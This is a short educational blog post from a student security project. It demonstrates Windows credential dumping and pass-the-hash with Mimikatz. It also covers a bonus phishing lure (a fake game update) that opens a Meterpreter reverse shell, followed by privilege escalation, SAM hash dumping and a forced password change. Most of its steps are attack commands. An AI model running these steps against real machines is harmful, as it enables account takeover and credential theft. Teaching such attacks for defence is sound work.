Passing the Hash with Mimikatz
Published on 07 Apr 2022
In this article, I'll walk you through how to use Mimikatz to obtain user passwords from a Windows machine. I'll also show you how to use Mimikatz in order to perform an attack called passing the hash (pth) to escalate your privileges and impersonate a user. Also as a bonus, I'll show you how you can utilise both a Meterpreter reverse shell and a phishing attack in order to get the same outcome but without needing physical access to the target's machine.
The contents in this article may be outdated
This article was made as a part of Cookies.sh – a project that I made in my university days to educate people about topics in Security.
What will you learn?
Mimikatz is well known to extract plaintexts, passwords, and hash from memory.
The world's most used penetration testing framework.
A Linux distribution designed for digital forensics and penetration testing.
Pre Set Up
- A target (preferably with consent)
- A windows machine with multiple user account (peferably one which has admin access)
- The Windows Defender (aka Window's firewall) has been turned off
- Mimikatz (and metasploit if you are attempting the bonus feature) downloaded
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
The Simple Way
- Log on as
FakeUserand demonstrate that without system admin privilege, we can't change the password of another account. - Launch
Mimikatzas an administrator - Use command
privilege::debugto escalate privileges - Use command
sekurlsa::logonpasswordsto dump all user passwords. - Get the hash of the user we want to impersonate (in this case, it's
User) and the domain of theFakeUseraccount. - Use command:
sekurlsa::pth /user:User /domain:[insert_user_domain_here] /ntlm:[insert_hash_here]
- A new console opens up.
- Demonstrate that the system thinks we are still
FakeUserbut we definitely areUser. - Now try changing the password and it will work. This is an pre-recording I did in case the lightning talk went sideways. If you can't view the recording below, use this link instead: Mimikatz Video
Bonus: The Fancy Way
- Launch Kali
- Open terminal and get IP using
ip addr - Launch Metasploit using
msfconsole - Use commands:
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP address]
set LPORT 4444
- Open another console and
cd /var/www/html - Start the apache server using
service apache2 start - Switch back to the meterpreter console and type
exploit - Switch over to the Windows machine and talk about how a simple social engineering can be done to gain access.
- Once launch
GTAVUpdate.exe, go back to Kali. - Show that we are now impersonating this user by
getuid - Escalate our privileges by
getsystem - Show that we are now system admin by
getuid - Load mimikatz using
load mimikatz - Show that we can get user password ntlm hashes using
lsa_dump_sam - Type in
shell - This launches the shell and we can verify that we are system admin by
whoami - Change password using
net user User hello
Reflection
From researching various topics about Mimikatz, passing the hash and Windows Defenders to ultimately doing a lightning talk (more like a lightning demo) about how to escalate privileges in Windows, I've learnt a lot about how powerful a tool Windows firewall is to detect malware like Mimikatz and how easy it was to hack someone's account when you have physical access (ie. GAME OVER!!!). The talk I did also spawned a couple of interesting questions about the validity of attacking a corporate network like how I demonstrated it. Spoiler alert: unless you have physical access to the network, you chances of you doing this is low. Even if you successfully manage to download Mimikatz, there are definitely going to be all sorts of red flags going off in the company's IT department.